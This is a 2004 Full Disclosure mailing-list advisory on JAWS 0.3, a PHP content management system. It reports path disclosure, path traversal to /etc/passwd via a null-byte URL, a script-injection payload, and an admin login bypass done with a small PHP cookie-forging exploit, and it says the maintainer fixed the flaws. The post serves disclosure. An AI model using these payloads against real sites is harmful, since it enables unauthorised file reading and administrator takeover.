Full Disclosure mailing list archives
Multiples vulnerabilities in JAWS
From: nando () gigax org
Date: Tue, 6 Jul 2004 01:19:48 -0600 (CST)
check this... ///////////////////////////////////////////////////// //// Vulnerable Program: JAWS //// //// Version : 0.3 ; it's BETA probably ;) //// //// Url: http://www.jaws.com.mx //// //// The Bug: Multiples vulnerabilities //// //// Date: Today, July 5 off 2004 //// //// Author: Fernando Quintero (a.k.a nonroot) //// Email: nando () gigax org ////////////////////////////////////////////////////// I. Affected software description: Jaws is a Framework and Content Management System for building dynamic web sites. It aims to be User Friendly giving ease of use and lots of ways to customize web sites, but at the same time is Developer Frendly, it offers a simple and powerful framework to hack your own modules. Jaws is Free Software under the GPL. note: to hack your own modules, to hack your own modules, to hack your own modules... ;) II. Bugs There are some vulnerabilities in the jaws code, it's were fixed quickly by your main coder. 1) Full path disclosure ... There are many ways to determine the full path to the web root directory: a) http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc Specifying a variable path, that does not exist. b) function jaws_error($text, $file, $line) { print ("<b style=\"color: #f00;\" JAWS Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.",line ".$line); exit; } The jaws_error() function, it returns the line and the full path to the name of the file. c) http://127.0.0.1/jaws/include/config.php Trying to open some file in the include directory. 2) Arbitrary file browsing. We can acceded to the file's content through the variable gadget. http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc This line show us the passwd file. The use of the "path" variable is irrelevant, in the code can be seen a line like: $path= str_replace ("..","",$path) --> at this way we filter the content of path, but in the index.php file the "gadget" variable is not filter. The "%00" is necessary because the script adds at the end of the name of "gadget" variable the extencion ".php" 3) XSS (the fashionable word) Cross site scripting in the variable action, because it script returns the content of the variable: http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b> http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script> In the index.php the vulnerable code is: jaws_error ("Invalid operation: You can't display this action [".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__); where "$go_gadget->action" content the erroneus action. 4) Validation without a password :) There exist a way that allow us to get in the control panel with administrator rights without a password. The admin.php file have: // if ($GLOBALS["app"]->logged_on()) { control panel code... ... } // The logged_on() function is in the application.php file. The function's code. // function logged_on() { return (md5($_SESSION["logged"]) ==$_COOKIE["logged"]); } // Is extrange to see this type of validation but there is!. The $_SESSION["logged"] variable before entering the Control Panel it has a Null ("") value. a possible way to exploit it should be: //BEGIN //exploit.php <?PHP setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path to jaws'); ?> //END Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash for the NULL value This way we can create a cookie ( that look like from the remote system) and then try the Url: http://127.0.0.1/jaws/admin.php and we will be inside. III. Solution ¨¨¨¨¨¨¨¨ The main coder was contacted and the code was fixed in the cvs ;). IV. Greetings - Greets to GIGAX people. - Greets All the community. I learn of you! V. Contact Fernando Quintero nando () gigax org Medellín-Colombia VI. Final words - Sorry by the english and !!! Viva Colombia !!!!!!!! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Multiples vulnerabilities in JAWS nando (Jul 06)